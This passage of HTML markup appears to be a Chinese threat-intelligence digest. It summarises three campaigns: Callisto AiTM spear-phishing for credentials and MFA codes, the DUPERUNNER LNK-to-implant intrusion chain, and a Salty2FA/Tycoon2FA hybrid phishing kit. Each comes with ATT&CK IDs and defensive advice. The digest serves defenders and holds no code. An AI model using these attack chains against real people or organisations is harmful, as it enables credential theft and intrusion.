0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8m951ldxp" style="font-size: 32px;" data-mpa-action-id="md8m952lbd3" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">01</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">利用重定向与JS工具的鱼叉式攻击窃取用户凭证</span></span></p></div></div></div></div></div></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p style="text-align: left;"><span mpa-font-style="md8j8nugupq" style="font-size: 14px;"><span style="font-weight: bold;"><span leaf="">攻击方式关键词：</span></span></span></p><p style="text-align: left;"><span style="font-size: 14px;text-align: justify;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;"><span leaf="">JavaScript（T1059.007）、有效账户（T1078）、恶意文件（T1204.002）、修改身份验证过程（T1556）、钓鱼（T1566）、域名（T1583.001）</span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span mpa-font-style="md8j8nug10ts" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></span></p><p><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://www.hendryadrian.com/french-ngo-reporters-without-borders-targeted-by-calisto-in-recent-campaign/" target="_blank">https://www.hendryadrian.com/french-ngo-reporters-without-borders-targeted-by-calisto-in-recent-campaign/</a></span></span></p></li></ul><p style="text-indent: 2em;margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="mdigd0bm1wvk" style="font-size: 14px;" data-mpa-action-id="mdigd0c31uc1" data-pm-slice="0 0 []">2025 年 5 至 6 月，Callisto组织针对相关机构实施鱼叉式网络钓鱼攻击，其自 2022 年起持续活动，长期通过账号窃取等技术开展定向攻击。本次攻击中，该组织以特定邮件服务为主题，伪装信任联系人发送邮件，用 “缺少附件” 或功能异常的诱饵诱导受害者回复，再通过被攻陷网站的 PHP 脚本重定向至伪造页面，同时借助特定域名上的自制 JavaScript 工具包，以注入恶意代码、控制输入框等方式，利用 AiTM 技术窃取用户凭证及多因素认证信息。攻击基础设施通过相关平台注册域名，借助泄露凭证控制多个网站，还利用代理服务隐藏身份。此次攻击成功窃取大量用户凭证，对受害组织信息安全构成严重威胁，可能引发敏感数据泄露及后续渗透风险。</span></p><p style="margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="md8j8nug1wkv" style="font-size: 14px;"><span textstyle="" style="font-weight: bold;">防护建议：</span></span></p><p style="margin-top: 0px;text-align: left;"><span leaf="" mpa-font-style="mdigdjvi20or" style="font-size: 14px;" data-mpa-action-id="mdigdjvs190d" data-pm-slice="0 0 []">加强邮件与网络安全防护，验证邮件来源与附件，避免点击未知链接，落实多因素认证，定期审查网站配置与域名注册情况，加强人员防范培训并监控异常访问。</span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdigfqighko"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8ma0u31cup" style="font-size: 32px;" data-mpa-action-id="md8ma0v2rky" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">02</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid="" data-mpa-action-id="mfag8t7o1pcm" data-pm-slice="0 0 []"><span mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span leaf=""><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">从伪装PDF到C&amp;C：DUPERUNNER协同渗透行动对相关部门构成严重威胁</span></span></span></p></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p style="text-align: left;"><span mpa-font-style="md8j8nugupq" style="font-size: 14px;"><span style="font-weight: bold;"><span leaf="">攻击方式关键词：</span></span></span></p><p style="text-align: left;"><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf="">从本地系统获取数据（T1005）、混淆文件或信息（T1027）、动态 API 解析（T1027.007）、伪装（T1036）、通过命令与控制通道进行数据窃取（T1041）、进程注入（T1055）、线程执行劫持（T1055.003）、进程发现（T1057）、PowerShell（T1059.001）、Web 协议（T1071.001）、系统信息发现（T1082）、非应用层协议（T1095）、入口工具传输（T1105）、屏幕截图（T1113）、数据编码（T1132）、恶意文件（T1204.002）、Rundll32（T1218.011）、向云账户传输数据（T1537）、鱼叉式钓鱼附件（T1566.001）、加密通道（T1573）</span></span></p></li><li><p><span mpa-font-style="md8jbwp71xl3" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></span></p><p><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://www.seqrite.com/blog/9512-2/" target="_blank">https://www.seqrite.com/blog/9512-2/</a></span></span></p></li></ul><p style="margin-top: 24px;text-indent: 2em;text-align: left;"><span leaf="" mpa-font-style="mdigfqi21vxd" style="font-size: 14px;">2025 年 11 月被追踪的一场网络攻击，通过钓鱼邮件散发含恶意 ZIP 存档的附件，将伪装成内部财务奖励政策的 PDF 诱饵以 LNK 文件呈现，针对企业 HR、薪资及内部行政管理相关部门，可能与相关支持型 APT 活动有关。攻击分三阶段展开：第一阶段，受害者点击恶意 LNK 文件后，通过系统内置工具在后台静默运行，下载并执行植入程序；第二阶段，该植入程序具备下载伪装 PDF、枚举合法进程、获取额外恶意文件等功能，最终将C&amp;C注入目标进程；第三阶段，通过自解压、内存扫描等技术隐蔽加载真实组件，借助 HTTP 或 TCP 与远控服务器建立通信。整个攻击链条设计精巧，利用系统内置工具和隐藏技术实现多层次渗透，可能导致内部敏感信息泄露、权限提升及后门植入，引发长期监控和数据失窃风险，严重影响企业运营与核心数据安全。</span></p><p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img" data-imgfileid="100027329" data-ratio="0.6324786324786325" data-s="300,640" type="block" data-type="png" data-w="468" src="https://wechat2rss.xlab.app/img-proxy/?k=60e8c2df&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6AoQM3RKCWVhxzkKUzA4xgvriaXViaJv9WgftgiaNAryickngYNh1hosbXibibDnvicPWWNY9bgnkP3upLAJPCkggISibg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="margin-top: 16px;text-align: left;"><span mpa-font-style="mdigfqi2x23" style="font-size: 14px;"><span leaf="" style=""><span textstyle="" style="font-weight: bold;">防护建议：</span></span></span></p><p style="margin-top: 0px;text-align: left;"><span mpa-font-style="mdigfqi2x23" style="font-size: 14px;"><span leaf="">加强钓鱼邮件及恶意附件检测，审计监控系统工具活动，及时更新补丁，部署具备威胁情报的防护检测系统，实行多层防护并强化员工安全意识培训。</span></span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdighks2kof"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8m9n1h17ag" style="font-size: 32px;" data-mpa-action-id="md8m9n2ku94" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">03</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">利用 Salty2FA 与 Tycoon2FA 的混合攻击链构建新型钓鱼威胁，可能加剧企业信息泄露风险</span></span></p></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p style="text-align: left;"><span style="font-weight: bold;font-size: 14px;" mpa-font-style="md8jdygzf90"><span leaf="">攻击方式关键词：</span></span></p><p style="text-align: left;"><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;text-align: justify;"><span leaf="">混淆文件或信息（T1027）、JavaScript（T1059.007）、Web 协议（T1071.001）、系统检查（T1497.001）、钓鱼（T1566）</span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p style="text-align: left;"><span mpa-font-style="md8jdygzm0s" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></span></p><p style="text-align: left;"><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://www.hendryadrian.com/salty2fa-tycoon2fa-hybrid-a-new-phishing-threat-to-enterprises/" target="_blank">https://www.hendryadrian.com/salty2fa-tycoon2fa-hybrid-a-new-phishing-threat-to-enterprises/</a></span></span></p></li></ul><p style="margin-top: 24px;text-indent: 2em;text-align: left;"><span leaf="" mpa-font-style="md8jdygzmy1" style="font-size: 14px;">近期分析显示，Salty2FA 相关基础设施崩溃后，攻击者激活 Tycoon2FA 作为后备方案，样本中同时出现两个工具的特征，推测二者可能存在合作或资源共享。攻击前半部分保留 Salty2FA 技术特征，主流程受阻后，通过预先植入的硬编码回退 URL 调用 Tycoon2FA 的指令执行链条，持续推进多阶段攻击。该攻击采用含 Base64 及 Base64-XOR 等混淆方法的复杂 JavaScript 技术，搭配反调试、沙箱规避手段隐藏执行逻辑，还通过域名生成算法生成的域名及特定托管模式隐匿网络通信，增加检测难度，其混合攻击模式各阶段均有独特技术指标和行为模式，给防御带来显著挑战。此类攻击可能导致企业关键信息与账户信息泄露，破坏网络安全防护体系，造成深远经济与声誉损失。</span></p><p style="margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="md8jdygz14il" style="font-size: 14px;"><span textstyle="" style="font-weight: bold;">防护建议：</span></span></p><p style="margin-top: 0px;text-align: left;"><span style="font-size: 14px;" mpa-font-style="mdighkrrvpq"><span leaf="">及时调整检测策略，重点监控相关多阶段执行逻辑、域名生成模式及反沙箱行为，更新应急响应剧本，结合交互式沙箱技术与威胁情报平台，快速识别拦截混合型攻击链。</span></span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdigjhd1sw3"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 